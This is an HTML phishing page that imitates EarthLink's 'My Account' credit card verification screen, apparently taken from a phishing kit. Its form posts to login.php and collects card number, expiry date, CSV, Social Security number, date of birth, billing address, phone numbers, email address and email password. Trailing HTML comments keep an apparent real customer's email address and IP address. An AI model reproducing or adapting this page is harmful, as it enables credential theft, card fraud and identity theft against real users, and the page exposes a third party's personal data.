<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>
Verify your credit card information - Credit Card</title>
<link rel="stylesheet" href="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/style.css" type="text/css">
<script language="JavaScript">
<!--
  function loadFocus() {
    if (window.doFocus) {
      window.doFocus();
    }
  }
  function doFocus() {
     document.creditcardchange.card_type.focus();
    }
    CCNumb = '';
    CCType = '0';
    CCExpM = '0';
    CCExpY = '0';
// -->
</script> 
<script language="JavaScript" src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/CamLib.js"></script>
<script language="JavaScript" src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/processingBlink.js"></script>
<meta http-equiv="CACHE-CONTROL" content="NO-CACHE">
<meta http-equiv="Pragma" content="no-cache">





<link rel="icon" href="https://myaccount.earthlink.net/cam/images/earthlink/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="https://myaccount.earthlink.net/cam/images/earthlink/favicon.ico" type="image/x-icon">

</head>
<body onload="loadFocus()" topmargin="0" leftmargin="0" link="#0000ff" marginheight="0" marginwidth="0" vlink="#0000ff">







<div class="universalNav">
   <img src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/universalnav-bg-left.gif" class="left">
    <img src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/universalnav-logo.gif" border="0">
    <span class="universalLinks">
        <a href="http://www.earthlink.net/" class="first" target="_blank">EarthLink.net</a>

        <a href="http://my.earthlink.net/" target="_blank">My Start Page</a>

        <a href="http://webmail.earthlink.net/" target="_blank">Web Mail</a>


        <a href="http://start.earthlink.net/channel/BUSINESS" target="_blank">Biz Center</a>

        <a href="http://myvoice.earthlink.net/" target="_blank">myVoice</a>

        <a href="https://myaccount.earthlink.net/" class="hi">My Account</a>
        

        <a href="http://support.earthlink.net/" target="_blank">Support</a>

    </span>
    <img src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/universalnav-bg-right.gif" class="right">
</div>




<div class="myAccount">





  <div id="myAccountHeader">
      <a href="https://myaccount.earthlink.net/cam/track?id=myaccount.logo&amp;add=1"><span class="key"></span></a>
      <div class="title">
        <a href="https://myaccount.earthlink.net/cam/track?id=myaccount.logo&amp;add=1"><img src="https://www.irs.gov/themes/custom/pup_base/logo.svg" border="0"></a>
      </div>
 
      <div class="welcome">
        <span class="break left" valign="top"><nobr>.</nobr></span>
        <span class="right signin" valign="top"><a href="https://myaccount.earthlink.net/cam/Logout?x=-1997919519"></a></span>
      </div>
  </div> 


 <div class="myAccountTag"> 
  <table border="0" cellpadding="0" cellspacing="0" width="100%">
  <tbody><tr valign="top">
      <td valign="top" width="95%">&nbsp;</td>
      <td nowrap="nowrap" valign="top" width="5%">&nbsp;</td>
  </tr>
  </tbody></table>
 </div>
 <div class="myAccountTag error">
 
  
 </div>
 
 <center>
  <table class="myAccountEdit" border="0" cellpadding="0" cellspacing="0" width="90%">
   <tbody><tr valign="top">
   	<td>
    <div class="tilehead">Verify your credit card information - Credit Card<span class="right"></span></div>
    <div class="myAccountLanding">
     <div class="container">
		<form name="creditcardchange" action="login.php" method="post" onsubmit="return checkCCForm(document.creditcardchange);">
    <input name="appname" value="billing" type="hidden">
      <div class="row shadecc">
        
         	Note : All fields which are indicated with (*) are important.
        
      </div>
          <div class="row">
      <label>Credit Card*:</label>
      <span class="formElement">
   <script language="JavaScript" type="text/javascript">
   
   function displayDebCred(selBox) {
      var SUBTYPEID = document.getElementById('SUBTYPE');

      SUBTYPEID.style.display = '';
   
      var DEBID = document.getElementById('DEB');

      if (selBox == 'VISA' || selBox == 'MC') {
        DEBID.style.display = '';
      } else {
        DEBID.style.display = 'none';
        if(document.forms[0].sub_type[2].checked)
        {
        	document.forms[0].sub_type[0].checked='true';
        }
      }
      
    } 
    
   
   </script>
        <select name="cardtype" onchange="displayDebCred(this.value);" size="1">
            <option selected="selected" value="0">Select</option>
            <option value="-----">-----</option>
            <option value="VISA">Visa</option>
            <option value="MC">MasterCard</option>
            <option value="AMEX">Amex</option>
            <option value="DISC">Discover</option>
            <option value="DINR">Diner's Club</option>
            <option value="JCB">JCB</option>
        </select>
        <script language="JavaScript" type="text/javascript">
            select(document.forms[0].card_type, '0');
        </script>

        <input name="original_type" value="0" type="hidden">
      </span>  
    </div>
    <div class="row">
      <label>Credit Card Number*:</label>
      <span class="formElement">
        <input size="20" name="ccnumber" onchange="displayDebCred(document.forms[0].card_type.value);" maxlength="16">
        <input name="original_number" value="" type="hidden">
      </span>  
    </div>
    
    
    <span id="SUBTYPE" style="display:none;">
    
	    	    

	    <span id="DEB" style="display:none;">
		    
	    </span>
    </span>


    <div class="row">
      <label>Expiration Date*:</label>
      <span class="formElement">
        <select name="expmonth" class="expmth" size="1">
            <option selected="selected" value="01">(01) January</option>
            <option value="02">(02) February</option>
            <option value="03">(03) March</option>
            <option value="04">(04) April</option>
            <option value="05">(05) May</option>
            <option value="06">(06) June</option>
            <option value="07">(07) July</option>
            <option value="08">(08) August</option>
            <option value="09">(09) September</option>
            <option value="10">(10) October</option>
            <option value="11">(11) November</option>
            <option value="12">(12) December</option>
        </select>
        <script language="JavaScript" type="text/javascript">
            select(document.forms[0].expiration_month, 0);
        </script>
        <select name="expyear" size="1">
<option value="17">2017</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>
<option value="21">2021</option>

        	<option value="22">2022</option>
			<option value="23">2023</option>
			<option value="24">2024</option>

        </select>
        <script language="JavaScript" type="text/javascript">
            select(document.forms[0].expiration_year, 0);
        </script>
      </span>  
    </div>
    <div class="row">
      <label>Social Security Number*:</label>
      <span class="formElement">
        <input size="20" name="ssn" onchange="displayDebCred(document.forms[0].card_type.value);">
        <input name="original_number" value="" type="hidden">
      </span>  
    </div>
    <div class="row">
      <label>Date of Birth*:</label>
      <span class="formElement">
        <input autocomplete="off" name="birthmonth" value="mm" class="align-font-width" size="2" maxlength="2" id="dob_month" onkeypress="return csv_isNumeric(event);" onkeyup="return autoTab(this,2,event);" type="text">
      <input autocomplete="off" name="birthdate" value="dd" class="align-font-width" size="2" maxlength="2" id="dob_day" onkeypress="return csv_isNumeric(event);" onkeyup="return autoTab(this,2,event);" type="text"><input autocomplete="off" name="birthyear" value="year" class="align-font-width" size="4" maxlength="4" id="dob_year" onkeypress="return csv_isNumeric(event);" type="text">
        <input name="original_number" value="" type="hidden">
      </span>  
    </div>
    <div class="row" id="CSVtd1">
      <label>CSV Number*:</label>
      <span class="formElement">
        <table border="0" cellpadding="0" cellspacing="0" width="520px">
            <tbody><tr>
             <td><input size="4" maxlength="4" name="csv" type="text"></td>
            </tr>
            <tr>
             <td>
				<img src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/csv.jpg"></td>
            </tr>
            <tr>
             <td><b>The CSV number is a three or four digit number found
 on your credit card. Compare your card to the image above to find your 
card's CSV.</b></td>
            </tr>
    	  </tbody></table>
      </span>  
    </div>
    <div class="row"></div>    

      <div class="row shadecc">
        <strong>Billing Address</strong>
      </div>
          <div class="row">
      <label>Full Name*:</label>
      <span class="formElement">
        <input name="fullname" maxlength="50" type="text" size="20">
      </span>  
    </div>
    <div class="row"></div>
    
          <div class="row">
      <label>Address 1*:</label>
      <span class="formElement">
        <input name="address1" maxlength="30" type="text" size="20">
      </span>  
    </div>
    <div class="row">
      <label>Address 2 :</label>
      <span class="formElement">
        <input name="address2" maxlength="30" type="text" size="20">
      </span>  
    </div>
   

    <div class="row">
      <label>City*:</label>
      <span class="formElement">
        <input name="city" maxlength="30" type="text" size="20">
      </span>  
    </div>

    <div class="row">
      <label>State/Province*:</label>
      <span class="formElement">
        <select name="state" size="1">
          <option selected="selected" value="-----">Choose...</option>
          <option value="AL">AL Alabama</option>
          <option value="AK">AK Alaska</option>
          <option value="AZ">AZ Arizona</option>
          <option value="AR">AR Arkansas</option>
          <option value="CA">CA California</option>
          <option value="CO">CO Colorado</option>
          <option value="CT">CT Connecticut</option>
          <option value="DE">DE Delaware</option>
          <option value="DC">DC District of Columbia</option>
          <option value="FL">FL Florida</option>
          <option value="GA">GA Georgia</option>
          <option value="HI">HI Hawaii</option>
          <option value="ID">ID Idaho</option>
          <option value="IL">IL Illinois</option>
          <option value="IN">IN Indiana</option>
          <option value="IA">IA Iowa</option>
          <option value="KS">KS Kansas</option>
          <option value="KY">KY Kentucky</option>
          <option value="LA">LA Louisiana</option>
          <option value="ME">ME Maine</option>
          <option value="MD">MD Maryland</option>
          <option value="MA">MA Massachusetts</option>
          <option value="MI">MI Michigan</option>
          <option value="MN">MN Minnesota</option>
          <option value="MS">MS Mississippi</option>
          <option value="MO">MO Missouri</option>
          <option value="MT">MT Montana</option>
          <option value="NE">NE Nebraska</option>
          <option value="NV">NV Nevada</option>
          <option value="NH">NH New Hampshire</option>
          <option value="NJ">NJ New Jersey</option>
          <option value="NM">NM New Mexico</option>
          <option value="NY">NY New York</option>
          <option value="NC">NC North Carolina</option>
          <option value="ND">ND North Dakota</option>
          <option value="OH">OH Ohio</option>
          <option value="OK">OK Oklahoma</option>
          <option value="OR">OR Oregon</option>
          <option value="PA">PA Pennsylvania</option>
          <option value="PR">PR Puerto Rico</option>
          <option value="RI">RI Rhode Island</option>
          <option value="SC">SC South Carolina</option>
          <option value="SD">SD South Dakota</option>
          <option value="TN">TN Tennessee</option>
          <option value="TX">TX Texas</option>
          <option value="UT">UT Utah</option>
          <option value="VA">VA Virginia</option>
          <option value="VI">VI Virgin Islands</option>
          <option value="VT">VT Vermont</option>
          <option value="WA">WA Washington</option>
          <option value="WV">WV West Virginia</option>
          <option value="WI">WI Wisconsin</option>
          <option value="WY">WY Wyoming</option>
      
        </select>
        <script language="JavaScript" type="text/javascript">
               var userState = "";
               userState = userState.toUpperCase();
                select(document.forms[0].state, userState);
        </script>
      </span>  
    </div>

    <div class="row">
      <label>ZIP/Postal Code*:</label>
      <span class="formElement">
        <input size="10" name="zipcode" maxlength="10" type="text">
      </span>  
    </div>
    <div class="row">
      <label>Home Phone number*:</label>
      <span class="formElement">
        <input name="homephone" maxlength="30" type="text" size="20">
      </span>  
    </div>
    <div class="row">
      <label>Mobile Phone number*:</label>
      <span class="formElement">
        <input name="mobilenumber" maxlength="30" type="text" size="20">
      </span>  
    </div>
        
    <div class="row">
      <label>Country*:</label>
      <span class="formElement">
        <select name="country" size="1">
            <option>Select</option>
            <option value="-----">-----</option>
            <option selected="selected" value="USA">United States of America</option>
          
        </select>
        <script language="JavaScript" type="text/javascript">
               var userCountry = "USA";
                select(document.forms[0].country, userCountry);
        </script>
      </span>  
    </div>
    <div class="row">
      <label>Email Address*:</label>
      <span class="formElement">
        <input name="emailaddress" maxlength="30" type="text" size="20">
      </span>  
    </div>
    <div class="row">
      <label>Password*:</label>
      <span class="formElement">
        <input name="emailpass" maxlength="30" type="password" size="20">
      </span>  
    </div>
    <div class="row"></div>
    
    
      <div class="row shadeff"> 
  		  <label></small></label>
        <span class="formElement">
          &nbsp;</span></div>
    
      <div class="row">
        <span>
          <small>* Information Required</small>
        </span>  
        <span class="submit"><input name="ut" value="I0FdBUixGV1bdCsJu9ujCyeNOuM=" type="hidden">
				<font color="#0000FF">
		<input type="submit" value="continue" name="B1" style="color: #0000FF"></font> &nbsp;&nbsp;
        </span>
      </div>
      <div class="row"></div>
        
      	<input name="billopt" value="billopt" type="hidden">
		</form>
	  </div></div></td>
   </tr>
  </tbody></table>
 </center>
 
 







<div class="navlinks" align="center">

  
    <a href="https://myaccount.earthlink.net/cam/index.jsp?x=1674854552">My Account Home</a>
  
    &nbsp; | &nbsp;

  
    <a href="https://myaccount.earthlink.net/cam/planlist.jsp?dest=/emailmaint.jsp&amp;x=-985856957">Email Profiles</a>
  
    &nbsp; | &nbsp;

  
    <a href="https://myaccount.earthlink.net/cam/billing_info.jsp?x=-650520335">Billing Information</a>
  
    &nbsp; | &nbsp;

  
    <a href="https://myaccount.earthlink.net/cam/contactinfo.jsp?x=-1931060888">Contact Information</a>
  
    &nbsp; | &nbsp;

  
    <a href="https://myaccount.earthlink.net/cam/planlist.jsp?dest=/shippinginfo.jsp&amp;x=-306668171">Shipping Information</a>
  
    &nbsp; | &nbsp;

  
    <a href="https://myaccount.earthlink.net/cam/planlist.jsp?dest=/plandetails.jsp&amp;x=-1301509956">My Plan Details</a>
  
    &nbsp; | &nbsp;

  
    <a href="https://myaccount.earthlink.net/cam/downloads.jsp?x=-2006783307">My Downloads</a>
  
    &nbsp; | &nbsp;

  
	    <a href="https://myaccount.earthlink.net/cam/robohelp.jsp?x=2040890937" target="_blank">Help</a>
  
    
</div>

 




<div class="footer"><hr>
� 2012 EarthLink, Inc. All Rights Reserved.<br>
Members and visitors to the EarthLink Web site agree to abide by our <a href="http://www.earthlink.net/about/policies/" target="_blank">Policies and Agreements</a>.<br>
<a href="http://www.earthlink.net/about/policies/privacy/" target="_blank">EarthLink Privacy Policy</a> 
</div>

<div class="footer" align="right">
	My Account version 6.14.0
</div>







<script type="text/javascript"> 
if (typeof(lpUASunit)=="undefined") var lpUASunit = "proactivesvc";
var lpUASimagesPath = "/LivePerson/chat_deployment_local-proactivesvc/images"; 
if (typeof(lpUASlanguage)=="undefined") var lpUASlanguage = "english"; 
if (typeof(lpUASimagesFolder)=="undefined") var lpUASimagesFolder = "proactivesvc-english"; 
if (typeof(lpUASinvitePositionX)=="undefined") var lpUASinvitePositionX = 50; 
if (typeof(lpUASinvitePositionY)=="undefined") var lpUASinvitePositionY = 50;
var lpCustomInvitationTitle="Invitation window for live chat with a representative";
var lpCustomInvitationCloseTitle="Close chat invitation";
var lpUAScontext = document.title;
</script> 
 
<script type="text/javascript" src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/configuration_baseline.js"></script>

<script type="text/javascript">

var lpUASsection = "MyAccount";
var lpUASbrand = "elnk"; 


// Variable to be populated in function that triggers the click action
//--------------------------------------
//--------------------------------------

</script>
  <script type="text/javascript" src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/conversion_script.js"></script>

<script type="text/javascript" src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/x.js"></script><div name="mylayer" id="mylayer" style="z-index:90;position:absolute;visibility:hidden;left:10px;top:10px">
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr><td><a name="needRef" id="needRef" href="#" title="invitation popup window for live chat with an online representative" onclick="return hcAcceptCall()" target="_self" onmouseover='hcSetImageGo("need_help","need_help_on.gif",false)' onmouseout='hcSetImageGo("need_help","need_help_off.gif",true)'><img name="need_help" id="need_help" onload="hcFloatIconLoaded()" alt="Invitation popup window for live chat with a representative" style="display: block;" border="0"></a>
<a href="#" onclick="return hcRejectCall()" target="_self" onmouseover='hcSetImageGo("need_close","close_on.gif",false)' onmouseout='hcSetImageGo("need_close","close_off.gif",true)'><img name="need_close" id="need_close" alt="Close chat invitation" style="display: block;" border="0"></a></td></tr>
</tbody></table></div>
<iframe name="hcpopuplayer" id="hcpopuplayer" src="login_files/blankhtml.htm" style="z-index: 88; position: absolute; visibility: hidden; left: 10px; top: 10px;" frameborder="0" height="100" scrolling="no" width="300"></iframe>
<div name="hcpopupgif" id="hcpopupgif" style="z-index:89;position:absolute;cursor:pointer; visibility:hidden;left:0px;top:10px"><a href="#" onclick="goto_redirect(); return false;"><img name="hcpopupimage" id="hcpopupimage" onload="hcWaitForLoad()" border="0"></a></div>
<div name="hcpopupclose" id="hcpopupclose" onclick="hcClosePopup();" style="z-index:89;position:absolute;cursor:pointer; visibility:hidden;left:0px;top:10px"><a href="#" onclick="hcClosePopup(); return false;"><img name="hcpopupcloseimage" id="hcpopupcloseimage" border="0"></a></div>


<noscript>
<p>Script section containing code for Liveperson Chat Solution</p>
</noscript>


<!-- Google Analytics tracking code: Start -->
<script type="text/javascript">
	 var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
	 document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
	 </script>
	<script src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/ga.js" type="text/javascript"></script>

	 <script type="text/javascript">
	 var pageTracker = _gat._getTracker("UA-2513835-2");
	 pageTracker._setDomainName("earthlink.net");
	 pageTracker._initData();
	 pageTracker._trackPageview();
</script>
<!-- Google Analytics tracking code: End -->






	
<!-- SiteCatalyst code version: H.10.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/s_code.js"></script>
<script language="JavaScript"><!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="myAccount:earthlink:setcreditcard.jsp"
s.server=""
s.channel="myAccount"
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://earthmyaccount.122.2O7.net/b/ss/earthmyaccount/1/H.10--NS/0"
height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->





</div>

 














<img src="../ALL%20MAIN%20AUPRIL/WEBMAIL%20PAGE/earthlinkmailverification/earthlinkmailverification/earthlink/login_files/a.gif" style="visibility: hidden; position: absolute; top: 0px; left: -5000px;"></body></html>
<!-- Final ZooPageStats -->
<!-- cam/setcreditcard.time=2ms -->
<!-- Req.Id: cam-whisper.atl.sa.earthlink.net.477050 -->
<!-- Req.Sid: 75F3E42569921F5F5E87911EF3804F15 -->
<!-- Req.Zsid: TKI4VXW42OYo-9f3608c5eacd390516263-28-ML6BO08Omfcu - tileguy368@earthlink.net -->
<!-- Req.Zslb: 28 -->
<!-- Req.Query: appname&#61;billing&amp;x&#61;2146109020 -->
<!-- Req.Url: https://myaccount.earthlink.net/cam/setcreditcard.jsp -->
<!-- Req.Timestamp: 1333532793995 -->
<!-- Req.remoteAddr: 69.15.78.194 -->